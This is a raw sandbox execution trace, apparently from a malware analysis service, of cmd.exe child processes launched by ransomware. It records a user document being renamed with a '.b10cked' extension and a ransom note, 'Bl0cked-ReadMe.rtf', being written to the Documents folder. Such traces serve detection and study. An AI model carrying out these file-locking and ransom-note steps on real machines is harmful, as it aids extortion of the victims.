[0235.074] FreeEnvironmentStringsW (penv=0x1c22e8) returned 1 [0235.074] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.074] GetEnvironmentVariableW (in: lpName="KEYS", 
lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0235.074] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0235.074] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0235.074] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0235.074] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0235.074] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0235.074] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0235.074] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0235.074] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0235.074] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f818 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.074] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x14f818, lpFilePart=0x14f814 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14f814*="Desktop") returned 0x18 [0235.074] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0235.074] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f594 | out: lpFindFileData=0x14f594) returned 0x1c0028 [0235.075] FindClose (in: hFindFile=0x1c0028 | out: hFindFile=0x1c0028) returned 1 [0235.075] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x14f594 | out: lpFindFileData=0x14f594) returned 0x1c0028 [0235.075] FindClose (in: hFindFile=0x1c0028 | out: hFindFile=0x1c0028) returned 1 [0235.075] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x14f594 | out: lpFindFileData=0x14f594) returned 0x1c0028 [0235.075] FindClose (in: hFindFile=0x1c0028 | out: hFindFile=0x1c0028) returned 1 [0235.075] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0235.075] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" 
(normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0235.075] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0235.075] GetEnvironmentStringsW () returned 0x1c2b08* [0235.076] FreeEnvironmentStringsW (penv=0x1c2b08) returned 1 [0235.076] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.076] GetConsoleOutputCP () returned 0x1b5 [0235.076] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.076] GetUserDefaultLCID () returned 0x409 [0235.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0235.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14f958, cchData=128 | out: lpLCData="0") returned 2 [0235.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14f958, cchData=128 | out: lpLCData="0") returned 2 [0235.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14f958, cchData=128 | out: lpLCData="1") returned 2 [0235.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0235.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0235.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0235.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0235.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0235.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0235.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0235.077] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0235.078] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0235.078] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0235.078] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0235.079] GetConsoleTitleW (in: lpConsoleTitle=0x1b08f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.079] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0235.079] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0235.079] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0235.079] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0235.080] _wcsicmp (_String1="move", _String2=")") returned 68 [0235.080] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0235.080] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0235.080] _wcsicmp (_String1="IF", _String2="move") returned -4 [0235.080] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0235.080] _wcsicmp (_String1="REM", _String2="move") returned 5 [0235.080] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0235.083] GetConsoleTitleW (in: lpConsoleTitle=0x14f650, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.083] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0235.083] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0235.083] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0235.083] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0235.083] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0235.083] _wcsicmp (_String1="move", _String2="CD") returned 10 [0235.084] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 
[0235.084] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0235.084] _wcsicmp (_String1="move", _String2="REN") returned -5 [0235.084] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0235.084] _wcsicmp (_String1="move", _String2="SET") returned -6 [0235.084] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0235.084] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0235.084] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0235.084] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0235.084] _wcsicmp (_String1="move", _String2="MD") returned 11 [0235.084] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0235.084] _wcsicmp (_String1="move", _String2="RD") returned -5 [0235.084] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0235.084] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0235.084] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0235.084] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0235.084] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0235.084] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0235.084] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0235.084] _wcsicmp (_String1="move", _String2="VER") returned -9 [0235.084] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0235.084] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0235.084] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0235.084] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0235.084] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0235.084] _wcsicmp (_String1="move", _String2="START") returned -6 [0235.084] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0235.084] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0235.084] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0235.086] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0235.086] GetDriveTypeW (lpRootPathName="C:\\") returned 
0x3 [0235.086] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14f40c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x14f404, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14f404*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.086] _wcsnicmp (_String1="COPYCMD", 
_String2="PROCESS", _MaxCount=0x7) returned -13 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0235.086] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0235.087] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0235.087] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0235.087] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0235.087] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0235.087] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0235.087] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0235.087] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0235.087] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0235.087] _wcsicmp (_String1="GAY66U~1.OTS", _String2=".") returned 57 [0235.087] _wcsicmp (_String1="GAY66U~1.OTS", _String2="..") returned 57 [0235.087] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\GAY66U~1.OTS" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\gay66u~1.ots")) returned 0x20 [0235.087] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1c1e68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.087] SetErrorMode (uMode=0x0) returned 0x0 [0235.087] SetErrorMode (uMode=0x1) returned 0x0 [0235.087] GetFullPathNameW (in: 
lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\GAY66U~1.OTS", nBufferLength=0x104, lpBuffer=0x14ed94, lpFilePart=0x14ed7c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\GAY66U~1.OTS", lpFilePart=0x14ed7c*="GAY66U~1.OTS") returned 0x2f [0235.087] SetErrorMode (uMode=0x0) returned 0x1 [0235.087] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1")) returned 0x12 [0235.088] _wcsicmp (_String1="GAY66U~1.OTS", _String2=".") returned 57 [0235.088] _wcsicmp (_String1="GAY66U~1.OTS", _String2="..") returned 57 [0235.088] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\GAY66U~1.OTS" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\gay66u~1.ots")) returned 0x20 [0235.088] SetErrorMode (uMode=0x0) returned 0x0 [0235.088] SetErrorMode (uMode=0x1) returned 0x0 [0235.088] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\GAY66U~1.OTS", nBufferLength=0x104, lpBuffer=0x14f210, lpFilePart=0x14efa8 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\GAY66U~1.OTS", lpFilePart=0x14efa8*="GAY66U~1.OTS") returned 0x2f [0235.088] SetErrorMode (uMode=0x0) returned 0x1 [0235.088] SetErrorMode (uMode=0x0) returned 0x0 [0235.088] SetErrorMode (uMode=0x1) returned 0x0 [0235.088] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\gaY66uwM4.ots.b10cked", nBufferLength=0x104, lpBuffer=0x14f418, lpFilePart=0x14efa8 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\gaY66uwM4.ots.b10cked", lpFilePart=0x14efa8*="gaY66uwM4.ots.b10cked") returned 0x38 [0235.088] SetErrorMode (uMode=0x0) returned 0x1 [0235.088] SetLastError (dwErrCode=0x0) [0235.088] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\gaY66uwM4.ots.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\gay66uwm4.ots.b10cked")) returned 0xffffffff [0235.088] GetLastError () returned 0x2 [0235.088] FindFirstFileExW (in: 
lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\GAY66U~1.OTS", fInfoLevelId=0x1, lpFindFileData=0x14e924, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e924) returned 0x1b0eb0 [0235.088] FindNextFileW (in: hFindFile=0x1b0eb0, lpFindFileData=0x14e924 | out: lpFindFileData=0x14e924) returned 0 [0235.089] GetLastError () returned 0x12 [0235.089] FindClose (in: hFindFile=0x1b0eb0 | out: hFindFile=0x1b0eb0) returned 1 [0235.090] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\GAY66U~1.OTS", fInfoLevelId=0x1, lpFindFileData=0x1c1c08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1c1c08) returned 0x1b0eb0 [0235.090] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\gaY66uwM4.ots.b10cked", nBufferLength=0x104, lpBuffer=0x14ebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\gaY66uwM4.ots.b10cked", lpFilePart=0x0) returned 0x38 [0235.090] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\gaY66uwM4.ots", nBufferLength=0x104, lpBuffer=0x14ebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\gaY66uwM4.ots", lpFilePart=0x0) returned 0x30 [0235.090] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\gaY66uwM4.ots" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\gay66uwm4.ots")) returned 0x20 [0235.090] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\gaY66uwM4.ots" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\gay66uwm4.ots"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\gaY66uwM4.ots.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\gay66uwm4.ots.b10cked"), dwFlags=0x3) returned 1 [0235.090] FindClose (in: hFindFile=0x1b0eb0 | out: hFindFile=0x1b0eb0) returned 1 [0235.091] _vsnwprintf (in: _Buffer=0x49fd5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x14eb70 | out: _Buffer=" 1") returned 9 
[0235.091] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.091] GetFileType (hFile=0x7) returned 0x2 [0235.382] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0235.382] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14eafc | out: lpMode=0x14eafc) returned 1 [0235.382] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.382] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14eb30 | out: lpConsoleScreenBufferInfo=0x14eb30) returned 1 [0235.382] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0235.383] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x14eb70 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0235.383] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49fe4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x14eb54, lpReserved=0x0 | out: lpBuffer=0x49fe4640*, lpNumberOfCharsWritten=0x14eb54*=0x1a) returned 1 [0235.383] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.383] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.383] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.383] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.383] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.383] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.383] SetConsoleInputExeNameW () returned 0x1 [0235.383] GetConsoleOutputCP () returned 0x1b5 [0235.383] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.383] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.383] exit (_Code=0) Process: id = "635" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c80" os_pid = "0xaa0" os_integrity_level = 
"0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35058 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35059 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35060 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35061 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 35062 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35063 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35064 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: 
"c:\\windows\\system32\\apisetschema.dll") Region: id = 35065 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35066 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 35067 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35162 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35163 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35164 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 35165 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 35166 start_va = 0x2a0000 end_va = 0x306fff entry_point = 0x2a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35167 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35168 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35169 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: 
"c:\\windows\\system32\\lpk.dll") Region: id = 35170 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35171 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35172 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35173 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35174 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35175 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35176 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 35177 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35178 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35179 start_va = 0x150000 end_va = 0x156fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 35180 start_va = 0x170000 end_va = 0x171fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 35181 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 35182 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 35183 start_va = 0x3e0000 end_va = 0x4e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 35184 start_va = 0x4f0000 end_va = 0x10effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 35185 start_va = 0x10f0000 end_va = 0x1252fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010f0000" filename = "" Thread: id = 875 os_tid = 0x740 [0234.483] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14f874 | out: lpSystemTimeAsFileTime=0x14f874*(dwLowDateTime=0xbf39d4e0, dwHighDateTime=0x1d440a9)) [0234.483] GetCurrentProcessId () returned 0xaa0 [0234.483] GetCurrentThreadId () returned 0x740 [0234.483] GetTickCount () returned 0x40675 [0234.483] QueryPerformanceCounter (in: lpPerformanceCount=0x14f86c | out: lpPerformanceCount=0x14f86c*=29127250224) returned 1 [0234.484] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0234.484] __set_app_type (_Type=0x1) [0234.484] __p__fmode () returned 0x76b331f4 [0234.484] __p__commode () returned 0x76b331fc [0234.484] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0234.484] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0234.484] GetCurrentThreadId () 
